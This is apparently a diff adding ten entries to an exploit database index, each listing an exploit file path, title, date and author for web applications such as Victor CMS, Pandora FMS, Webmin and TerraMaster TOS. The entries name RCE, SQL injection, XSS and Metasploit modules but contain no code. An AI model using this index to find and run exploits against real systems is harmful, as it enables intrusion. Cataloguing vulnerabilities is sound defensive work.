+49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",2020-12-22,Mosaaed,webapps,php,
+49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",2020-12-22,"Matthew Aberegg",webapps,php,
+49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",2020-12-22,"Musyoka Ian",webapps,php,
+49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
+49316,exploits/php/webapps/49316.txt,"Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
+49317,exploits/php/webapps/49317.rb,"WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-22,"SunCSR Team",webapps,php,
+49318,exploits/linux/webapps/49318.rb,"Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)",2020-12-22,AkkuS,webapps,linux,
+49319,exploits/php/webapps/49319.txt,"Artworks Gallery Management System 1.0 - 'id' SQL Injection",2020-12-22,"Vijay Sachdeva",webapps,php,
+49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php,
+49321,exploits/linux/webapps/49321.py,"TerraMaster TOS 4.2.06 - RCE (Unauthenticated)",2020-12-22,IHTeam,webapps,linux,